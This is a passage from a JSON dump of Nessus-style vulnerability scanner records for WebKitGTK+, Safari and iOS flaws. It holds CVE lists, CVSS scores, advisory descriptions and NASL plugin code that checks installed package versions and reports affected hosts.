(rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"typelib-1_0-WebKit2-4_0-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"webkit2gtk-4_0-injected-bundles-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"webkit2gtk3-debugsource-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"typelib-1_0-WebKit2-4_0-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"webkit2gtk-4_0-injected-bundles-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.22.6-2.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"webkit2gtk3-debugsource-2.22.6-2.35.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkit2gtk3\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:28:08", "description": "The remote host is affected by the vulnerability described in GLSA-201903-12 (WebkitGTK+: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in WebKitGTK+. Please review the referenced CVE identifiers for details.\n Impact :\n\n An attacker could execute arbitrary code or conduct cross-site scripting.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-03-14T00:00:00", "type": "nessus", "title": "GLSA-201903-12 : WebkitGTK+: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-6212", "CVE-2019-6215", "CVE-2019-6216", "CVE-2019-6217", "CVE-2019-6226", "CVE-2019-6227", "CVE-2019-6229", "CVE-2019-6233", "CVE-2019-6234"], "modified": "2019-04-02T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:webkit-gtk", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201903-12.NASL", "href": "https://www.tenable.com/plugins/nessus/122834", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201903-12.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122834);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/04/02 21:54:17\");\n\n script_cve_id(\"CVE-2019-6212\", \"CVE-2019-6215\", \"CVE-2019-6216\", \"CVE-2019-6217\", \"CVE-2019-6226\", \"CVE-2019-6227\", \"CVE-2019-6229\", \"CVE-2019-6233\", \"CVE-2019-6234\");\n script_xref(name:\"GLSA\", value:\"201903-12\");\n\n script_name(english:\"GLSA-201903-12 : WebkitGTK+: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201903-12\n(WebkitGTK+: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in WebKitGTK+. Please\n review the referenced CVE identifiers for details.\n \nImpact :\n\n An attacker could execute arbitrary code or conduct cross-site\n scripting.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201903-12\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All WebkitGTK+ users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-libs/webkit-gtk-2.22.6'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:webkit-gtk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-libs/webkit-gtk\", unaffected:make_list(\"ge 2.22.6\"), vulnerable:make_list(\"lt 2.22.6\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"WebkitGTK+\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:28:32", "description": "The Webkitgtk project reports :\n\nCVE-2019-6212 - Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2019-6215 - Processing maliciously crafted web content may lead to arbitrary code execution. A type confusion issue was addressed with improved memory handling.\n\nCVE-2019-6216 - Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2019-6217 - Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2019-6226 - Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2019-6227 - Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling.\n\nCVE-2019-6229 - Processing maliciously crafted web content may lead to universal cross site scripting. A logic issue was addressed with improved validation.\n\nCVE-2019-6233 - Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling.\n\nCVE-2019-6234 - Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-02-25T00:00:00", "type": "nessus", "title": "FreeBSD : webkit-gtk -- Multiple vulnabilities (e3aacd6d-3d01-434c-9330-bc9efd40350f)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-6212", "CVE-2019-6215", "CVE-2019-6216", "CVE-2019-6217", "CVE-2019-6226", "CVE-2019-6227", "CVE-2019-6229", "CVE-2019-6233", "CVE-2019-6234"], "modified": "2019-04-02T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:webkit-gtk2", "p-cpe:/a:freebsd:freebsd:webkit-gtk3", "p-cpe:/a:freebsd:freebsd:webkit2-gtk3", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_E3AACD6D3D01434C9330BC9EFD40350F.NASL", "href": "https://www.tenable.com/plugins/nessus/122413", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122413);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/04/02 21:54:17\");\n\n script_cve_id(\"CVE-2019-6212\", \"CVE-2019-6215\", \"CVE-2019-6216\", \"CVE-2019-6217\", \"CVE-2019-6226\", \"CVE-2019-6227\", \"CVE-2019-6229\", \"CVE-2019-6233\", \"CVE-2019-6234\");\n\n script_name(english:\"FreeBSD : webkit-gtk -- Multiple vulnabilities (e3aacd6d-3d01-434c-9330-bc9efd40350f)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Webkitgtk project reports :\n\nCVE-2019-6212 - Processing maliciously crafted web content may lead to\narbitrary code execution. Multiple memory corruption issues were\naddressed with improved memory handling.\n\nCVE-2019-6215 - Processing maliciously crafted web content may lead to\narbitrary code execution. A type confusion issue was addressed with\nimproved memory handling.\n\nCVE-2019-6216 - Processing maliciously crafted web content may lead to\narbitrary code execution. Multiple memory corruption issues were\naddressed with improved memory handling.\n\nCVE-2019-6217 - Processing maliciously crafted web content may lead to\narbitrary code execution. Multiple memory corruption issues were\naddressed with improved memory handling.\n\nCVE-2019-6226 - Processing maliciously crafted web content may lead to\narbitrary code execution. Multiple memory corruption issues were\naddressed with improved memory handling.\n\nCVE-2019-6227 - Processing maliciously crafted web content may lead to\narbitrary code execution. A memory corruption issue was addressed with\nimproved memory handling.\n\nCVE-2019-6229 - Processing maliciously crafted web content may lead to\nuniversal cross site scripting. A logic issue was addressed with\nimproved validation.\n\nCVE-2019-6233 - Processing maliciously crafted web content may lead to\narbitrary code execution. A memory corruption issue was addressed with\nimproved memory handling.\n\nCVE-2019-6234 - Processing maliciously crafted web content may lead to\narbitrary code execution. A memory corruption issue was addressed with\nimproved memory handling.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2019-0001.html\"\n );\n # https://vuxml.freebsd.org/freebsd/e3aacd6d-3d01-434c-9330-bc9efd40350f.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d9ed359d\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:webkit-gtk2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:webkit-gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:webkit2-gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"webkit2-gtk3<2.22.6\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"webkit-gtk2>=0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"webkit-gtk3>=0\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-22T14:47:08", "description": "The version of Apple iOS running on the mobile device is prior to 12.1. It is, therefore, affected by multiple vulnerabilities. The highest of which could allow an attacker to perform a remote code execution attack by enticing a user to view malicious web content.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-12-13T00:00:00", "type": "nessus", "title": "Apple iOS < 12.1.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4303", "CVE-2018-4429", "CVE-2018-4430", "CVE-2018-4431", "CVE-2018-4435", "CVE-2018-4436", "CVE-2018-4437", "CVE-2018-4438", "CVE-2018-4439", "CVE-2018-4440", "CVE-2018-4441", "CVE-2018-4442", "CVE-2018-4443", "CVE-2018-4445", "CVE-2018-4446", "CVE-2018-4447", "CVE-2018-4460", "CVE-2018-4461", "CVE-2018-4464", "CVE-2018-4465"], "modified": "2022-06-21T00:00:00", "cpe": ["cpe:/o:apple:iphone_os"], "id": "APPLE_IOS_1211_CHECK.NBIN", "href": "https://www.tenable.com/plugins/nessus/119610", "sourceData": "Binary data apple_ios_1211_check.nbin", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:27:14", "description": "The version of Apple iOS running on the mobile device is prior to 12.1.1. It is, therefore, affected by multiple vulnerabilities. The highest of which could allow an attacker to perform a remote code execution attack by enticing a user to view malicious web content.", "cvss3": {"score": 6.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L"}, "published": "2019-04-17T00:00:00", "type": "nessus", "title": "Apple iOS < 12.1.1 Multiple Vulnerabilities (APPLE-SA-2018-12-05-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4437", "CVE-2018-4438", "CVE-2018-4441", "CVE-2018-4442", "CVE-2018-4443", "CVE-2018-4464", "CVE-2018-4435", "CVE-2018-4461", "CVE-2018-4447", "CVE-2018-4465", "CVE-2018-4303", "CVE-2018-4460", "CVE-2018-4429", "CVE-2018-4436", "CVE-2018-4439", "CVE-2018-4431", "CVE-2018-4445", "CVE-2018-4440", "CVE-2018-4446", "CVE-2018-4430"], "modified": "2019-04-17T00:00:00", "cpe": ["cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*"], "id": "700555.PRM", "href": "https://www.tenable.com/plugins/nnm/700555", "sourceData": "Binary data 700555.prm", "cvss": {"score": 6.8, "vector": "CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:27:12", "description": "The version of Apple Safari installed on the remote host is prior to 12.0.3. It is, therefore, affected by the following vulnerabilities :\n\n - Input-validation errors exist that allow memory corruption leading to arbitrary code execution. (CVE-2019-6212, CVE-2019-6215, CVE-2019-6216, CVE-2019-6217, CVE-2019-6226, CVE-2019-6227, CVE-2019-6233, CVE-2019-6234)\n\n - Input-validation errors exist that allow an attacker to perform cross-site scripting attacks. (CVE-2019-6228, CVE-2019-6228)\n\nNote that Nessus Network Monitor has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-04-08T00:00:00", "type": "nessus", "title": "Apple Safari < 12.0.3 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-6212", "CVE-2019-6215", "CVE-2019-6216", "CVE-2019-6217", "CVE-2019-6226", "CVE-2019-6227", "CVE-2019-6229", "CVE-2019-6233", "CVE-2019-6234", "CVE-2019-6228"], "modified": "2019-04-08T00:00:00", "cpe": ["cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:*"], "id": "700508.PRM", "href": "https://www.tenable.com/plugins/nnm/700508", "sourceData": "Binary data 700508.prm", "cvss": {"score": 9.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:29:20", "description": "The version of Apple Safari installed on the remote macOS or Mac OS X host is prior to 12.0.3. It is, therefore, affected by the following vulnerabilities :\n\n - Input-validation errors exist that allow memory corruption leading to arbitrary code execution.\n (CVE-2019-6212, CVE-2019-6215, CVE-2019-6216, CVE-2019-6217, CVE-2019-6226, CVE-2019-6227, CVE-2019-6233, CVE-2019-6234)\n\n - Input-validation errors exist that allow an attacker to perform cross-site scripting attacks. (CVE-2019-6228, CVE-2019-6228)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-01-25T00:00:00", "type": "nessus", "title": "macOS : Apple Safari < 12.0.3 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-6212", "CVE-2019-6215", "CVE-2019-6216", "CVE-2019-6217", "CVE-2019-6226", "CVE-2019-6227", "CVE-2019-6228", "CVE-2019-6229", "CVE-2019-6233", "CVE-2019-6234"], "modified": "2019-10-31T00:00:00", "cpe": ["cpe:/a:apple:safari"], "id": "MACOSX_SAFARI12_0_3.NASL", "href": "https://www.tenable.com/plugins/nessus/121388", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121388);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/10/31 15:18:51\");\n\n script_cve_id(\n \"CVE-2019-6212\",\n \"CVE-2019-6215\",\n \"CVE-2019-6216\",\n \"CVE-2019-6217\",\n \"CVE-2019-6226\",\n \"CVE-2019-6227\",\n \"CVE-2019-6228\",\n \"CVE-2019-6229\",\n \"CVE-2019-6233\",\n \"CVE-2019-6234\"\n );\n script_bugtraq_id(\n 106691,\n 106692,\n 106696,\n 106699\n );\n\n script_name(english:\"macOS : Apple Safari < 12.0.3 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the Safari version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS or Mac OS X host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple Safari installed on the remote macOS or Mac OS X\nhost is prior to 12.0.3. It is, therefore, affected by the following\nvulnerabilities :\n\n - Input-validation errors exist that allow memory\n corruption leading to arbitrary code execution.\n (CVE-2019-6212, CVE-2019-6215, CVE-2019-6216,\n CVE-2019-6217, CVE-2019-6226, CVE-2019-6227,\n CVE-2019-6233, CVE-2019-6234)\n\n - Input-validation errors exist that allow an attacker to\n perform cross-site scripting attacks. (CVE-2019-6228,\n CVE-2019-6228)\n\nNote that Nessus has not tested for these issues but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT209449\");\n # https://lists.apple.com/archives/security-announce/2019/Jan/msg00003.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3f718015\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple Safari version 12.0.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-6234\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:safari\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_Safari31.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Safari/Installed\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X or macOS\");\n\nif (!preg(pattern:\"Mac OS X 10\\.(12|13|14)([^0-9]|$)\", string:os)) audit(AUDIT_OS_NOT, \"macOS Sierra 10.12 / macOS High Sierra 10.13 / macOS Mojave 10.14\");\n\ninstalled = get_kb_item_or_exit(\"MacOSX/Safari/Installed\", exit_code:0);\npath = get_kb_item_or_exit(\"MacOSX/Safari/Path\", exit_code:1);\nversion = get_kb_item_or_exit(\"MacOSX/Safari/Version\", exit_code:1);\n\nfixed_version = \"12.0.3\";\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n report = report_items_str(\n report_items:make_array(\n \"Path\", path,\n \"Installed version\", version,\n \"Fixed version\", fixed_version\n ),\n ordered_fields:make_list(\"Path\", \"Installed version\", \"Fixed version\")\n );\n security_report_v4(port:0, severity:SECURITY_WARNING, extra:report);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Safari\", version, path);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:36:01", "description": "This update addresses the following vulnerabilities :\n\n - [CVE-2017-7018](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7018), [CVE-2017-7030](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7030), [CVE-2017-7034](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7034), [CVE-2017-7037](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7037), [CVE-2017-7039](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7039), [CVE-2017-7046](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7046), [CVE-2017-7048](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7048), [CVE-2017-7055](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7055), [CVE-2017-7056](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7056), [CVE-2017-7061](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7061), [CVE-2017-7064](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7064)\n\nAdditional fixes :\n\n - Fix rendering of spin buttons with GTK+ >= 3.20 when the entry width is too short.\n\n - Fix the build when Wayland target is enabled and X11 disabled.\n\n - Fix several crashes and rendering issues.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-07-31T00:00:00", "type": "nessus", "title": "Fedora 25 : webkitgtk4 (2017-73d6a0dfbb)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-7018", "CVE-2017-7030", "CVE-2017-7034", "CVE-2017-7037", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7048", "CVE-2017-7055", 